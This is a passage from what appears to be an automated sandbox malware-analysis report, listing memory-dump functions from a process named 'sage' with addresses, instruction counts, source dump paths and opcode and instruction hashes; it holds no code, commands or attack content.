                                                                                                                                                • Instruction ID: e53b1ff35b3bf7ce94c4f08023bb94cda6f52ec4067d04427d0e343dfce8b7c9
                                                                                                                                                • Opcode Fuzzy Hash: 9121b6a8feb0920d78386dbcf2e28a440715e17fec84f30e8e3d0270ba6f3214
                                                                                                                                                • Instruction Fuzzy Hash: 3A21C275604240EFDB14EF28D8C4B66BB66EB88314F24C569E84B4B386D73AD847CA71
                                                                                                                                                Function 00DBD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5957893157.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_dbd000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: f72540a39b45aeaf349035e13a07e0a3b412a1b9a512c47722ba83f8bc7e7f9e
                                                                                                                                                • Instruction ID: b43ef480c162bdaeca8b98a00d380885fdfa1c37e5023da6c11fc157aac87ada
                                                                                                                                                • Opcode Fuzzy Hash: f72540a39b45aeaf349035e13a07e0a3b412a1b9a512c47722ba83f8bc7e7f9e
                                                                                                                                                • Instruction Fuzzy Hash: 6E21F271504280EFDB05DF14D9C0B66BBA6FB88314F34C66DE84A4B242D33AD846CB71
                                                                                                                                                Function 02A4C030 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 750651f3eebde8ca9098b760058fc7163911280b35e76bb1ce4e365e97afdb27
                                                                                                                                                • Instruction ID: 80720ade9bcef73d1aa7ff3ff66fa617d9aad5e2a7c62280d61c8e7f33a7010a
                                                                                                                                                • Opcode Fuzzy Hash: 750651f3eebde8ca9098b760058fc7163911280b35e76bb1ce4e365e97afdb27
                                                                                                                                                • Instruction Fuzzy Hash: 6311E6B1828201CBD301FBBCD8493197FE1EB81314F418DA9D4C9E7181DE39C869CB96
                                                                                                                                                Function 02A44420 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a7cb30f8f04807b36b3e39c3341e1f2a99df9038400fd275ad51e12a31db486b
                                                                                                                                                • Instruction ID: df7ecefc58e8911d80ef19caa1cef254c36e8d5a9af177598a98e440f765bdd8
                                                                                                                                                • Opcode Fuzzy Hash: a7cb30f8f04807b36b3e39c3341e1f2a99df9038400fd275ad51e12a31db486b
                                                                                                                                                • Instruction Fuzzy Hash: 7E114D36A00204DBCB148F64D894BEEBBB6FB8C310F148169E912A7790CA719C11CBA0
                                                                                                                                                Function 00DBD005 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5957893157.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_dbd000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a4c5c44a4bd02cb2e786cc6d08d763a7c6645270eedfd4ded61ff8f3cdc29e6f
                                                                                                                                                • Instruction ID: c3aaa6e028091a0406078645b38052651a872913fb5b26c4bffa1b408a320d87
                                                                                                                                                • Opcode Fuzzy Hash: a4c5c44a4bd02cb2e786cc6d08d763a7c6645270eedfd4ded61ff8f3cdc29e6f
                                                                                                                                                • Instruction Fuzzy Hash: AF2180755093C0CFDB12DF24D990715BF72EB46314F28C5EAD8498B2A7C33A980ACB62
                                                                                                                                                Function 02A4C710 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: d3e0a72dcdebc62c84164326f9818b4c08fab7195e870d6d4ec60b37d0e75329
                                                                                                                                                • Instruction ID: da6460930c928519dd2e0c65f84964b0fa7c642e87c94835ebec949b2efaf4bb
                                                                                                                                                • Opcode Fuzzy Hash: d3e0a72dcdebc62c84164326f9818b4c08fab7195e870d6d4ec60b37d0e75329
                                                                                                                                                • Instruction Fuzzy Hash: FB118F74A15619DBC304BBF9E489A1E7FF6EB85310F4048A9E048F3244DF399C95C7A5
                                                                                                                                                Function 02A44D48 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8138d703fb6ab97616f0796cc328399ba68756b4fcf94ef185f689ac90939e7f
                                                                                                                                                • Instruction ID: 134398828485eb6ad89f990ba39e5580c14d9662fbc110a899ae0d7144b0d5a2
                                                                                                                                                • Opcode Fuzzy Hash: 8138d703fb6ab97616f0796cc328399ba68756b4fcf94ef185f689ac90939e7f
                                                                                                                                                • Instruction Fuzzy Hash: DA11CC35709390DFC715177958247ABFA9BAFCA310F14857AE546C3396CD288C0683B1
                                                                                                                                                Function 00DBD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5957893157.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_dbd000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2d4981aff5dcf7b1fdaf38f60d6a83d7629a3a1e179a2025f34979c2780b8776
                                                                                                                                                • Instruction ID: ddcb2821d02366701d4b5a7fcee22a965adde007f87896586ad1f362680625b9
                                                                                                                                                • Opcode Fuzzy Hash: 2d4981aff5dcf7b1fdaf38f60d6a83d7629a3a1e179a2025f34979c2780b8776
                                                                                                                                                • Instruction Fuzzy Hash: 75118B75904280DFDB12CF14D5C4B55BBA2FB88314F28C6AAD84A4B696D33AD84ACB61
                                                                                                                                                Function 02A4C060 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: bac417f5735d45f7de221766f03d099ffa71a44c4d9f59dde125af60f8acee01
                                                                                                                                                • Instruction ID: 9791cf8eefb43556153b4e7d578c474a8ca0233002adc69a1fb862ad6e39f5fe
                                                                                                                                                • Opcode Fuzzy Hash: bac417f5735d45f7de221766f03d099ffa71a44c4d9f59dde125af60f8acee01
                                                                                                                                                • Instruction Fuzzy Hash: 1701D670928601CBC300BBBDD44911E7BE5EF85320F408D69E4C9A3280EF39DC69CB9A
                                                                                                                                                Function 00DAD7D9 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5957446846.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_dad000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 211a2b0db55351b34087ab26842c2d16a1771a0a8f3ffc635e1f401136170b5c
                                                                                                                                                • Instruction ID: 44d9bff4a708916e90f860a6c0b27dc5ca6da7ce93d2e41eb28f3005cee12634
                                                                                                                                                • Opcode Fuzzy Hash: 211a2b0db55351b34087ab26842c2d16a1771a0a8f3ffc635e1f401136170b5c
                                                                                                                                                • Instruction Fuzzy Hash: 8D01DB314043409AE7205A26DC84B67FF99DF46374F28C51AED4B5A786C37DD844CAB1
                                                                                                                                                Function 02A49603 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4d4fcb1119caeb3ed20ccb5ea7efbf86a6c1e551c3ae87c830419548e33ac851
                                                                                                                                                • Instruction ID: c7100910210a34e0c588f87d6e7041760fff16a794dfb8aeba146d0d04091c6d
                                                                                                                                                • Opcode Fuzzy Hash: 4d4fcb1119caeb3ed20ccb5ea7efbf86a6c1e551c3ae87c830419548e33ac851
                                                                                                                                                • Instruction Fuzzy Hash: 3B01FB74A045468FDB11CF59D5848AFFBF6EF88310B654165E809A7311DB30ED15CB61
                                                                                                                                                Function 00DAD7D8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5957446846.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_dad000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c12bd1c11de57676f399fb21be13d75326174c5dce326b65486e78dd19c961cc
                                                                                                                                                • Instruction ID: 8d3afa891d0218c209a88b88c41cbb2970548aabfc53f5058c6152d4e7c5eb87
                                                                                                                                                • Opcode Fuzzy Hash: c12bd1c11de57676f399fb21be13d75326174c5dce326b65486e78dd19c961cc
                                                                                                                                                • Instruction Fuzzy Hash: FFF06D71404644AAE7208A1ADCC4B62FFA8EF96774F28C55AED095A782C37D9844CAB1
                                                                                                                                                Function 02A409C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a70474095c1e6055be1e860115efc2c7f14471784d8491ef5dd78a4d2f5a7353
                                                                                                                                                • Instruction ID: 7fb06282fa92543549089e08041d468a504c6899a2fdb7f69f08f2348e15bfaa
                                                                                                                                                • Opcode Fuzzy Hash: a70474095c1e6055be1e860115efc2c7f14471784d8491ef5dd78a4d2f5a7353
                                                                                                                                                • Instruction Fuzzy Hash: 00E0D872D09244DFD7148BF4E8215BDBF30FED7211B1481D2D14AAB366DE28D516D760
                                                                                                                                                Function 02A40FD9 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 3e955c2183c5353bc98dc135cb0e0b79e4aea4b404f2c0b3ce1a830607613153
                                                                                                                                                • Instruction ID: 3893e386aa36636727244d71478fe53bd06b8f330981952047c98a18e2b4f666
                                                                                                                                                • Opcode Fuzzy Hash: 3e955c2183c5353bc98dc135cb0e0b79e4aea4b404f2c0b3ce1a830607613153
                                                                                                                                                • Instruction Fuzzy Hash: 4DF0A034C18248DFCB00DFB9A44969DBFF0AF89310F1045E9D849A3212D7315685CB40
                                                                                                                                                Function 02A40FE8 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: ce5efae0a1f82c2519b0c6e2f0b1a61e917407e7e022855ffa449af73c2a0ad3
                                                                                                                                                • Instruction ID: 5b0e5bc526c28e1f0f170dea7129c69201a56fd68f4381fab0248ccb14317229
                                                                                                                                                • Opcode Fuzzy Hash: ce5efae0a1f82c2519b0c6e2f0b1a61e917407e7e022855ffa449af73c2a0ad3
                                                                                                                                                • Instruction Fuzzy Hash: 11E04F34D04308DFCB40DFA9A54829CBBF8AB89301F1045A59808E3304EB319A80DB50
                                                                                                                                                Function 02A46458 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 6f9b3d9eaaf64efe4da5af4f8f6143ca045ccf1851e4e6b2c2ba988bd1519db7
                                                                                                                                                • Instruction ID: 71c35e26721f57ee01ac0289538b43d67b6aed7602c4095b3c4860cd9f2a0ed7
                                                                                                                                                • Opcode Fuzzy Hash: 6f9b3d9eaaf64efe4da5af4f8f6143ca045ccf1851e4e6b2c2ba988bd1519db7
                                                                                                                                                • Instruction Fuzzy Hash: 95E0863440D3C45FC70B97759C70E597FB9DD42240F0581D5D082DA667D568584B8B71
                                                                                                                                                Function 02A48608 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                • Instruction ID: e97bdc12ba887b3174ce61926fbdbf3a2812d762d031508b7a6a9627fef76c59
                                                                                                                                                • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                • Instruction Fuzzy Hash: 57C0123360C2282EA224208E7C80EA3AA8CD2C22B4A210177F91CA32009C46AC8041A4
                                                                                                                                                Function 02A46468 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9c87041d6d869abff669c0cdbc3c90f67117654d1102e2f71810591cd0f1010a
                                                                                                                                                • Instruction ID: 555af71154ecae8540c87ebc37dd2a567bfe8df002d0202f8a1b874628948ca6
                                                                                                                                                • Opcode Fuzzy Hash: 9c87041d6d869abff669c0cdbc3c90f67117654d1102e2f71810591cd0f1010a
                                                                                                                                                • Instruction Fuzzy Hash: 6EC0223040430897C20DF730EC20F08779EEBC0380F80C010A006D5309DE78AC818BB4